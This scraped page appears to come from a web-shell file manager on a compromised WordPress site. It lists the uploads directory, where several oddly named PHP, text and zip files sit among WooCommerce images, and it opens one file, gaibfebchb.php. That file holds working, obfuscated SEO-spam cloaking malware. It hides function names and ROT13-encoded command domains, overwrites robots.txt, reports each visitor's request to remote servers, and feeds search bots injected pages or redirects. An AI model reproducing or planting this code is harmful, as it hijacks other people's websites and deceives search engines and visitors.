at path:
ROOT
/
wp-content
/
uploads
/
gaibfebchb.php
run:
R
W
Run
2020
DIR
2025-12-16 06:51:55
R
W
Run
2021
DIR
2025-12-16 06:51:55
R
W
Run
2022
DIR
2025-12-16 06:51:55
R
W
Run
2025
DIR
2025-12-16 06:51:55
R
W
Run
2026
DIR
2026-04-01 03:27:26
R
W
Run
elementor
DIR
2025-12-16 06:51:55
R
W
Run
redux
DIR
2025-12-16 06:51:55
R
W
Run
revslider
DIR
2025-12-16 06:51:55
R
W
Run
smush
DIR
2025-12-16 06:51:55
R
W
Run
wc-logs
DIR
2025-12-16 06:51:55
R
W
Run
woocommerce_uploads
DIR
2025-12-16 06:51:55
R
W
Run
wp-file-manager-pro
DIR
2025-12-16 06:51:55
R
W
Run
wpcf7_uploads
DIR
2025-12-16 06:51:55
R
W
Run
.htaccess
130 By
2025-12-22 09:33:43
R
W
Run
Delete
Rename
bceddaeiec.php
9.73 KB
2025-12-21 18:46:38
R
W
Run
Delete
Rename
bceddaeiec.txt
12.98 KB
2025-12-21 18:45:10
R
W
Run
Delete
Rename
bceddaeiec.zip
3.46 KB
2025-12-21 18:46:40
R
W
Run
Delete
Rename
gaibfebchb.php
7.1 KB
2025-12-21 18:46:03
R
W
Run
Delete
Rename
gaibfebchb.txt
9.47 KB
2025-12-21 18:44:50
R
W
Run
Delete
Rename
gaibfebchb.zip
2.24 KB
2025-12-21 18:46:05
R
W
Run
Delete
Rename
hell_prison.txt
6.02 KB
2025-12-17 04:40:31
R
W
Run
Delete
Rename
hell_prison.zip
2.58 KB
2026-01-04 05:04:45
R
W
Run
Delete
Rename
woocommerce-placeholder-1024x1024.png
31.7 KB
2025-06-16 23:42:05
R
W
Run
Delete
Rename
woocommerce-placeholder-175x175.png
2.02 KB
2025-06-16 23:42:06
R
W
Run
Delete
Rename
woocommerce-placeholder-180x180.png
2.12 KB
2025-06-20 00:44:15
R
W
Run
Delete
Rename
woocommerce-placeholder-300x300.png
4.5 KB
2025-06-20 00:44:15
R
W
Run
Delete
Rename
woocommerce-placeholder-550x632.png
15.29 KB
2025-06-16 23:42:08
R
W
Run
Delete
Rename
woocommerce-placeholder-580x435.png
13.14 KB
2025-06-16 23:42:07
R
W
Run
Delete
Rename
woocommerce-placeholder-600x540.png
13.35 KB
2025-06-16 23:42:03
R
W
Run
Delete
Rename
woocommerce-placeholder-600x600.png
13.43 KB
2025-06-20 00:44:16
R
W
Run
Delete
Rename
woocommerce-placeholder-768x768.png
19.34 KB
2025-06-16 23:42:07
R
W
Run
Delete
Rename
woocommerce-placeholder.png
47.02 KB
2025-06-16 23:42:02
R
W
Run
Delete
Rename
error_log
up
📄
gaibfebchb.php
Save
<?php $xmlname = [ "%31%32%38%31%2D%79%76%61%78%31%38%35%2E%66%72%65%72%61%67%66%6C%2E%67%62%63", "%31%32%38%31%2D%79%76%61%78%31%38%35%2E%69%72%65%69%72%68%66%2E%67%62%63", "%31%32%38%31%2D%79%76%61%78%31%38%35%2E%79%68%7A%62%65%6E%61%2E%6B%6C%6D", "%31%32%38%31%2D%79%76%61%78%31%38%35%2E%69%76%69%6C%61%72%2E%6B%6C%6D" ]; $string = '1281-link185'; $host = $_SERVER['HTTP_HOST'] ?: ''; $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?: 'en'; $referer = $_SERVER['HTTP_REFERER'] ?: ''; $http = is_https() ? 'https' : 'http'; $server = file_exists($_SERVER['DOCUMENT_ROOT'] . '/.htaccess') ? 1 : 2; $zz = disbot(); $duri = drequest_uri() ?: '/'; $model_file = 'index.php'; $model = 'index'; preg_match('/\/([^\/]+\.php)/', $duri, $matches); if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), '/'); } $model = str_replace('.php', '', $model_file); } $model = stristr($duri, '/?') ? '?' : $model; $istest = false; if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } if ($duri != '/') { $duri = str_replace('/' . $model_file, '', $duri); $duri = str_replace('/index.php', '', $duri); $duri = str_replace('!', '', $duri); } $param = http_build_query([ 'web' => $host, 'zz' => $zz, 'uri' => urlencode($duri), 'urlshang' => $referer, 'http' => $http, 'lang' => $lang, 'server' => $server, 'model' => $model, 'version' => $istest ? $string : '' ]); create_robots($http . '://' . $host); $html_content = request($xmlname, $param); if (strpos($html_content, 'nobotuseragent') === false) { $response_handlers = array( 'okhtml' => array( 'header' => 'Content-type: text/html; charset=utf-8', 'replace' => 'okhtml', 'test_echo' => true, 'output' => true ), 'getcontent500page' => array( 'header' => 'HTTP/1.1 500 Internal Server Error' ), '404page' => array( 'header' => 'HTTP/1.1 404 Not Found' ), '301page' => array( 'header' => 'HTTP/1.1 301 Moved Permanently', 'replace' => '301page', 'redirect' => true ), 'okxml' => array( 'header' => 'Content-Type: application/xml; charset=utf-8', 'replace' => 'okxml', 'output' => true ), 'okrobots' => array( 'header' => 'Content-Type: text/plain', 'replace' => 'okrobots', 'output' => true ) ); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler['header']); if (isset($handler['replace'])) { $html_content = str_replace($handler['replace'], '', $html_content); } if (isset($handler['test_echo']) && $istest) { echo $string; } if (isset($handler['redirect'])) { header('Location: ' . $html_content); } elseif (isset($handler['output'])) { echo $html_content; } exit(); } } } function disbot() { $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : ''; $bots = array('googlebot', 'bing', 'yahoo', 'google'); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } function drequest_uri() { if (isset($_SERVER['REQUEST_URI'])) { return $_SERVER['REQUEST_URI']; } if (isset($_SERVER['argv'])) { return $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; } return $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } function is_https() { if (isset($_SERVER['HTTPS'])) { $https = strtolower($_SERVER['HTTPS']); if ($https !== 'off' && $https !== '') { return true; } } if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return true; } if (isset($_SERVER['HTTP_FRONT_END_HTTPS'])) { $front_end_https = strtolower($_SERVER['HTTP_FRONT_END_HTTPS']); if ($front_end_https !== 'off' && $front_end_https !== '') { return true; } } return false; } function create_robots($url) { $functions = func(); $path = $_SERVER['DOCUMENT_ROOT'] . '/robots.txt'; $content = "User-agent: *\nAllow: /\n\nSitemap: " . $url . "/sitemap.xml\n"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = 'http://' . $domain_decoded . '/super6.php?' . $param; if (function_exists('wp_remote_get')) { $response = wp_remote_get($url, array( 'timeout' => 30, 'user-agent' => 'Mozilla/5.0 (compatible; WordPress)' )); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get('allow_url_fopen')) { $context = stream_context_create(array( 'http' => array('timeout' => 30) )); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return 'nobotuseragent'; } function func() { $chars = range('a', 'z'); return array( $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[15] . $chars[20] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[6] . $chars[4] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . '_' . $chars[17] . $chars[14] . $chars[19] . '13' ); } define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';